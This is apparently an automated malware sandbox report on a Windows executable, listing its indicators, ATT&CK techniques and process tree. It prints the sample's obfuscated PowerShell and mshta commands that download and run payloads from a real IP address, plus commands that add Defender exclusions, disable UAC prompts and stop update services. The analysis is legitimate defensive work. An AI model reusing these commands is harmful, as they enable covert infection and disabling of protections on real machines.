00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

Analysis

max time kernel
150s
max time network
140s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 02:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe
Size

50KB
MD5

666248c216a3f63828f739839230f9f6
SHA1

13690837235053762a538b4c5b2b601ec9f6bb22
SHA256

00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da
SHA512

37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde
SSDEEP

768:CT6n3V7i+V39HhHw98cje6O7UgYWE8knmbN8vnoK:7i+/BHw98cyoWE8ks8vnp

Score

10^/10

defense_evasion evasion execution persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language

hta

Source

URLs

hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/1.png

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exemshta.exepowershell.exe

flow pid process

5 2472 powershell.exe
6 2100 powershell.exe
8 796 mshta.exe
9 348 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1080 powershell.exe
1248 powershell.exe
2612 powershell.exe
2472 powershell.exe
2100 powershell.exe
348 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Sets service image path in registry 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Processes:

services.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\LIB\ImagePath = "C:\\ProgramData\\Mig\\Mig.exe" services.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
5	2472	powershell.exe
6	2100	powershell.exe
8	796	mshta.exe
9	348	powershell.exe

pid	process
1080	powershell.exe
1248	powershell.exe
2612	powershell.exe
2472	powershell.exe
2100	powershell.exe
348	powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\LIB\ImagePath = "C:\\ProgramData\\Mig\\Mig.exe"	services.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LB31.exeMig.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LB31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LB31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Mig.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Mig.exe

Executes dropped EXE 2 IoCs

Processes:

LB31.exeMig.exe

pid process

1916 LB31.exe
280 Mig.exe

pid	process
1916	LB31.exe
280	Mig.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	svchost.exe

Loads dropped DLL 2 IoCs

Processes:

powershell.exeservices.exe

pid process

348 powershell.exe
476 services.exe
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

1212 powercfg.exe
1088 powercfg.exe
2160 powercfg.exe
1652 powercfg.exe
2596 powercfg.exe
2784 powercfg.exe
2848 powercfg.exe
2788 powercfg.exe

pid	process
348	powershell.exe
476	services.exe

pid	process
1212	powercfg.exe
1088	powercfg.exe
2160	powercfg.exe
1652	powercfg.exe
2596	powercfg.exe
2784	powercfg.exe
2848	powercfg.exe
2788	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exeLB31.exepowershell.exeMig.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	LB31.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Mig.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

LB31.exeMig.exe

description	pid	process	target process
PID 1916 set thread context of 292	1916	LB31.exe	dialer.exe
PID 280 set thread context of 748	280	Mig.exe	dialer.exe
PID 280 set thread context of 2224	280	Mig.exe	dialer.exe
PID 280 set thread context of 1468	280	Mig.exe	dialer.exe

Drops file in Windows directory 3 IoCs

Processes:

wusa.exesvchost.exewusa.exe

description	ioc	process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2176	sc.exe
2572	sc.exe
2344	sc.exe
1996	sc.exe
3032	sc.exe
1768	sc.exe
1696	sc.exe
2736	sc.exe
2384	sc.exe
1480	sc.exe
2512	sc.exe
1568	sc.exe
2240	sc.exe
1760	sc.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

2960 ipconfig.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
2960	ipconfig.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30544e7d823cdb01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeLB31.exepowershell.exedialer.exeMig.exepowershell.exe

pid	process
2472	powershell.exe
2100	powershell.exe
2472	powershell.exe
2472	powershell.exe
348	powershell.exe
1080	powershell.exe
348	powershell.exe
348	powershell.exe
1916	LB31.exe
1248	powershell.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
1916	LB31.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
1916	LB31.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
1916	LB31.exe
1916	LB31.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
280	Mig.exe
2612	powershell.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
292	dialer.exe
280	Mig.exe
280	Mig.exe
280	Mig.exe
280	Mig.exe
280	Mig.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exepowershell.exedialer.exepowercfg.exedialer.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	292	dialer.exe
Token: SeShutdownPrivilege	1652	powercfg.exe
Token: SeShutdownPrivilege	1088	powercfg.exe
Token: SeShutdownPrivilege	2160	powercfg.exe
Token: SeShutdownPrivilege	2596	powercfg.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	748	dialer.exe
Token: SeShutdownPrivilege	1212	powercfg.exe
Token: SeLockMemoryPrivilege	1468	dialer.exe
Token: SeShutdownPrivilege	2784	powercfg.exe
Token: SeShutdownPrivilege	2788	powercfg.exe
Token: SeShutdownPrivilege	2848	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe
Token: SeUndockPrivilege	848	svchost.exe
Token: SeManageVolumePrivilege	848	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe
Token: SeUndockPrivilege	848	svchost.exe
Token: SeManageVolumePrivilege	848	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe
Token: SeUndockPrivilege	848	svchost.exe
Token: SeManageVolumePrivilege	848	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exewscript.exepowershell.exeWScript.execmd.exepowershell.exemshta.exepowershell.execmd.exeLB31.exedialer.exe

description	pid	process	target process
PID 2420 wrote to memory of 2488	2420	00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe	wscript.exe
PID 2420 wrote to memory of 2488	2420	00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe	wscript.exe
PID 2420 wrote to memory of 2488	2420	00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe	wscript.exe
PID 2488 wrote to memory of 2472	2488	wscript.exe	powershell.exe
PID 2488 wrote to memory of 2472	2488	wscript.exe	powershell.exe
PID 2488 wrote to memory of 2472	2488	wscript.exe	powershell.exe
PID 2488 wrote to memory of 2100	2488	wscript.exe	powershell.exe
PID 2488 wrote to memory of 2100	2488	wscript.exe	powershell.exe
PID 2488 wrote to memory of 2100	2488	wscript.exe	powershell.exe
PID 2472 wrote to memory of 2124	2472	powershell.exe	WScript.exe
PID 2472 wrote to memory of 2124	2472	powershell.exe	WScript.exe
PID 2472 wrote to memory of 2124	2472	powershell.exe	WScript.exe
PID 2124 wrote to memory of 804	2124	WScript.exe	cmd.exe
PID 2124 wrote to memory of 804	2124	WScript.exe	cmd.exe
PID 2124 wrote to memory of 804	2124	WScript.exe	cmd.exe
PID 804 wrote to memory of 796	804	cmd.exe	mshta.exe
PID 804 wrote to memory of 796	804	cmd.exe	mshta.exe
PID 804 wrote to memory of 796	804	cmd.exe	mshta.exe
PID 2100 wrote to memory of 2960	2100	powershell.exe	ipconfig.exe
PID 2100 wrote to memory of 2960	2100	powershell.exe	ipconfig.exe
PID 2100 wrote to memory of 2960	2100	powershell.exe	ipconfig.exe
PID 796 wrote to memory of 348	796	mshta.exe	powershell.exe
PID 796 wrote to memory of 348	796	mshta.exe	powershell.exe
PID 796 wrote to memory of 348	796	mshta.exe	powershell.exe
PID 348 wrote to memory of 1080	348	powershell.exe	powershell.exe
PID 348 wrote to memory of 1080	348	powershell.exe	powershell.exe
PID 348 wrote to memory of 1080	348	powershell.exe	powershell.exe
PID 348 wrote to memory of 1916	348	powershell.exe	LB31.exe
PID 348 wrote to memory of 1916	348	powershell.exe	LB31.exe
PID 348 wrote to memory of 1916	348	powershell.exe	LB31.exe
PID 1520 wrote to memory of 1512	1520	cmd.exe	wusa.exe
PID 1520 wrote to memory of 1512	1520	cmd.exe	wusa.exe
PID 1520 wrote to memory of 1512	1520	cmd.exe	wusa.exe
PID 1916 wrote to memory of 292	1916	LB31.exe	dialer.exe
PID 1916 wrote to memory of 292	1916	LB31.exe	dialer.exe
PID 1916 wrote to memory of 292	1916	LB31.exe	dialer.exe
PID 1916 wrote to memory of 292	1916	LB31.exe	dialer.exe
PID 1916 wrote to memory of 292	1916	LB31.exe	dialer.exe
PID 1916 wrote to memory of 292	1916	LB31.exe	dialer.exe
PID 1916 wrote to memory of 292	1916	LB31.exe	dialer.exe
PID 292 wrote to memory of 432	292	dialer.exe	winlogon.exe
PID 292 wrote to memory of 476	292	dialer.exe	services.exe
PID 292 wrote to memory of 492	292	dialer.exe	lsass.exe
PID 292 wrote to memory of 500	292	dialer.exe	lsm.exe
PID 292 wrote to memory of 592	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 668	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 752	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 808	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 848	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 964	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 112	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 1016	292	dialer.exe	spoolsv.exe
PID 292 wrote to memory of 1060	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 1100	292	dialer.exe	taskhost.exe
PID 292 wrote to memory of 1152	292	dialer.exe	Dwm.exe
PID 292 wrote to memory of 1176	292	dialer.exe	Explorer.EXE
PID 292 wrote to memory of 2012	292	dialer.exe	OSPPSVC.EXE
PID 292 wrote to memory of 1120	292	dialer.exe	wmiprvse.exe
PID 292 wrote to memory of 1264	292	dialer.exe	DllHost.exe
PID 292 wrote to memory of 2128	292	dialer.exe	svchost.exe
PID 292 wrote to memory of 1040	292	dialer.exe	sppsvc.exe
PID 292 wrote to memory of 2632	292	dialer.exe	wmiprvse.exe
PID 292 wrote to memory of 1916	292	dialer.exe	LB31.exe
PID 292 wrote to memory of 1088	292	dialer.exe	powercfg.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Loads dropped DLL
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1120
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1264
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    - Checks processor information in registry
    PID:2632
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
    3⤵
    PID:2196
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:668
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  PID:752
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:808
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1152
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:848
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:964
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:112
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1016
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1060
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1100
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:2012
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2128
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1040
- C:\ProgramData\Mig\Mig.exe
  C:\ProgramData\Mig\Mig.exe
  2⤵
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:280
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:320
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2964
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2344
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1480
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1996
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1760
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2240
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:748
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2224
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1468

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1176
- C:\Users\Admin\AppData\Local\Temp\00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe
  "C:\Users\Admin\AppData\Local\Temp\00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\system32\wscript.exe
    "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:804
        
        C:\Windows\system32\mshta.exe
        
        mshta http://176.113.115.178/Windows-Update
        7⤵
        Blocklisted process makes network request
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        8⤵
        UAC bypass
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1080
        
        C:\Users\Admin\AppData\Roaming\LB31.exe
        
        "C:\Users\Admin\AppData\Roaming\LB31.exe"
        9⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1916
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        10⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:1520
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        11⤵
        Drops file in Windows directory
        
        PID:1512
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        10⤵
        Launches sc.exe
        
        PID:3032
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        10⤵
        Launches sc.exe
        
        PID:1768
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        10⤵
        Launches sc.exe
        
        PID:2572
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        10⤵
        Launches sc.exe
        
        PID:2512
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        10⤵
        Launches sc.exe
        
        PID:2176
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1088
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596
        
        C:\Windows\system32\powercfg.exe
